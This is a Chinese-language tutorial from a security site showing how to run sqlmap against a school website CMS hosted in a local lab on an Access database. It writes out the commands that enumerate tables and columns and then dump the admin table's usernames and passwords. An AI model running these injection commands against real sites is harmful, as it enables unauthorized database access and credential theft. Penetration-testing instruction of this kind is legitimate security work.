频道栏目
首页 > 安全 > 工具软件 > 正文

Sqlmap简单注入access数据库教程

2013-07-19 08:27:13           
收藏   我要投稿
什么是SQLMap?

SqlMap是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞和接管数据库服务器的过程。它通过了一个强大的检测引擎,最终渗透测试和广泛的从数据库中的指纹持久的开关,从数据库中提取数据,访问底层的文件系统和操作系统执行命令的许多利基功能带外连接。

项目网站:http://sqlmap.sourceforge.net/

支持的数据库:MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB,几乎囊括了市面上所有的数据库

对于Sqlmap的强悍,用过了才知道

下面通过一个简单的实例演示:

测试环境:Backtrack 5&windows7(x64)sqlmap/1.0-dev(r4405)

本打算用windows2003下的iis环境,可惜电脑配置跑不动两个虚拟机,直接在本机win7下用小旋风搭建iis,虚拟机开Backtrack 5跑sqlmap.

ScreenClip

我这里用的是”校无忧学校网站 ”源码,

ScreenClip [3]

注入点的查找不多说,这里找到一个:http://192.168.121.1/NewsView.asp?id=8

我这里只获得列名,表名,和内容.Backtrack 5运行我们的Sqlmap神器,

输入命令:python sqlmap.py -u http://192.168.121.1/NewsView.asp?id=8 –tables

\

是否列表名,选Y

 ScreenClip [7]

设置线程,我这里设置8

ScreenClip [5]

只需要一分钟不到,表段就爆出来了

ScreenClip [6]

下面爆字段,输入命令:python sqlmap.py -u http://192.168.121.1/NewsView.asp?id=8 –columns -T ” admin”查看admin表所在的列名

ScreenClip [8]

速度一样飞快

ScreenClip [9]

获取内容,python sqlmap.py -u http://192.168.121.1/NewsView.asp?id=8 –dump -C “username,password” -T “admin”

ScreenClip [10]

这只是Sqlmap功能的九牛一毛,若想深入了解,推荐阅读Sqlmap说明文件

相关TAG标签 数据库 教程
上一篇:超简单利用burpsuite爆破wordpress后台密码及修复
下一篇:利用Sqlmap测试MetInfo企业网站管理系统MySql注入
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站